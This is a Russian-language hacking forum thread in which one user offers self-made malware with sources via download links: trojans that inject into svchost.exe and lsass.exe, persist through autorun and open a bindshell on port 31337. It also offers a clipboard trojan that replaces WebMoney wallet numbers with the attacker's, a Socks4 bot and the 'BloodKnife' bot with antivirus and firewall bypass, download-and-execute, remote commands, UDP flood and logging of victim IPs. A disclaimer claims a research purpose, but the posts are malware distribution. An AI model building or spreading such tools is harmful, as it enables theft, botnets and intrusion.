Сообщений в теме: 6

[Ky3bMu4]

Вся предоставленная здесь информация представлена,чтобы показать производителям уязвимость их продукции,автор не несет ответсвенности за незаконное использование данной информации"


Вот,  написал.
1)Размер 5кб(не паковал).
2)Копирование в системную директорию.
3)инжект в svchost.exe
4)Запись в автозагрузку.
5)Палит тока один antivir(антивирус такой:grin: )
6)шелл на 31337`атом порту.
www.lordofring.tushino.com/virus.rar - с исходниками.
Если попросите дам вам билд, который пишет ip жертвы через php скрипт в файл. Билдера нет - вирь на с++.  
//-----------------------------------------------------------------------------------------------------------------------
Вот написал ещё 1. BETA потому, что скоро времени не будет вообще, а когда свободен буду - хз. Хотелось поскорее выложить.
Итак:
1)С инжектом не получилось, но зато обход фаеры винды.
2)Вес 8,5кб.
3)Отправление месаги юзеры
4)Download&&execute
5)Просмотр содержимого файла
6)Разные приколы(игра с панелькой винды, open\close cd-rom , нажатие кнопки пуск.).
7)Выполнение комманд cmd(не bindshell, т.к. ответа от cmd не будет)
http://lordofring.tu...com/virusN2.rar
//-----------------------------------------------------------------------------------------------------------------------
сорцы троя, заменяющего номера webmoney кошелей - вашими
Вот, вместе с одним человеком написал(выкладываю с его разрешения). Билд выкладывать не имеет смысла. Вот исходники. Сильно не бейте.
http://www.lordofrin...om/main.cpp.txt
http://www.lordofrin...o.com/inj.h.txt

Мои любимые: пись в автозагрузку, копи в сис диру, инжект в lsass.exe.
Распознование кошеля такое:
1)Проверяем существование WebMoney.exe
2)Есть ли в буфере 13символов
3)Ну и с какой буквы начинается(R,Z,E,U)
//---------------------------------------------------------------------------------------------------------------------------
Socks4 bot
Вот грубо накидал ботика.
Порт 5555.
СКАЧАТЬ - сам вирь
www.lordofring.tushino.com/12.rar - исходники.

[Ky3bMu4]

Вот, наконец то появилось время дописать. Итак, описание:

1)Есть какой-никакой обход фаеров(переписаный _dkcs_ddos_bot`овский).
2)SDT restore(обход проактивок).
3)Инжектом опять не получилось.

Функции:
1)Отправка месаги юзеру.
2)просмотр содержимого файла.
3)Download && Execute.
4)Открыть\закрыть cd-rom.
5)Разные игры с панелькой винды, нажатие кнопки пуск.
6)Выполнение команд в cmd.
7)UDP Flood(!).
8)Выключение виря.


Правда вес подкачал - 60кб. Управляется через клиент. Ну, думаю такому монстру нужно дать имя. Назвал BloodKnife. Думаю сделать web-админку. Но это в лучше случае весной. Ну и самое главное - c исходниками!

Скачать:
http://lordofring.tu...dKnife_v1.0.rar
http://softz.ifolder.ru/2420331
http://http://rapids...e_v1.0.rar.html

[Ky3bMu4]

Ну, и сразу версия 1.2.
+Таки сделал инжект в svchost!
+уменьшение размера до 56кб.
+bindshell на 31337`атом порту(через telnet).
+меньше палева.
Клиент юзать, что и для версии 1.0 .

http://lordofring.tu...com/BKv.1.2.rar - вместе с исходниками новых функций.

[Ky3bMu4]

Версия 1.4
+Размер уменьшен до 15кб.
+Добавлен отстук по стату. IP заражённых компов пишется в лог.

http://lordofring.tu...Knife.v.1.4.rar - с исходниками.

[Ky3bMu4]

Обновил Bindshell.
+SDT Restore(обход проактивок - ижект не палится)
+Добавлен отстук по стату - Ip заражённых компов пишется в лог.
+Размер увеличен до 11кб.

http://lordofring.tu...dshellv.1.1.rar - с исходниками.

[DEN-009]

Есть исходники трояв на дельфи?
Если есть киньте ссылку.

[pinini]

блин ни одна ссылка не работает